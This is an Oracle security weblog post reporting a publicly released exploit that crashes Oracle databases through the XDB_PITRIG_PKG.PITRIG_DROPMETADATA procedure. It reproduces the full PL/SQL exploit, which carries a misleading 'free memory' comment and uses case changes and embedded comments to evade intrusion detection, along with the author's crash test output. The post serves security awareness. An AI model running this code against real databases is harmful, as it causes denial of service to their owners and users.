Call: +44 (0)1904 557620 Call

Pete Finnigan's Oracle Security Weblog

This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.

[Previous entry: "Pete Finnigan speaking about Oracle 11g Security tomorrow at UKOUG DBMS SIG"] [Next entry: "Pete Finnigan Oracle 11g Security presentation slides available"]

Exploit code to crash an Oracle database posted

Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for Oracle database using the package XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. No versions were given as to which are vulnerable but Alex posted in his blog that unpatched and systems are affected and crash. I tested this on an unpatched database:

SQL> grant create session to x identified by x;

Grant succeeded.

SQL> connect x/x
SQL> edit
Wrote file afiedt.buf

1 -- Utility to free Oracle memory
2 declare
3 larry varchar2(32767);
4 mary varchar2(32767);
5 begin
6 larry:='larryellison';
7 larry:=larry||larry;
8 larry:=larry||larry;
9 larry:=larry||larry;
10 larry:=larry||larry;
11 larry:=larry||larry;
12 larry:=larry||larry;
13 larry:=larry||larry;
14 mary:='maryann';
15 mary:=mary||mary;
16 mary:=mary||mary;
17 mary:=mary||mary;
18 mary:=mary||mary;
19 mary:=mary||mary;
20 mary:=mary||mary;
21 mary:=mary||mary;
22 mary:=mary||mary;
23 xDb
24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
25 , larry);
26* end;
SQL> /
ERROR at line 2:
ORA-03135: connection lost contact

SQL> connect system/manager
ORA-12514: TNS:listener does not currently know of service requested in connect

SQL> connect system/manager

As you can see running this Oracle exploit code causes the connection to the database to be lost. This in fact has crashed the database. I had to restart the database:


The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes and also embedded comments to throw off IDS and IPS software that use simple rules to detect this type of attack.

There has been 1 Comment posted on this article

November 8th, 2007 at 08:13 pm

Pete Finnigan says:

Tried this on on Tru64 both with and without CPUOct2007. Both versions had the following error, but neither database crashed.

exception system: exiting due to multiple internal errors:
exception dispatch or unwind stuck in infinite loop
exception dispatch or unwind stuck in infinite loop
ERROR at line 1:
ORA-03113: end-of-file on communication channel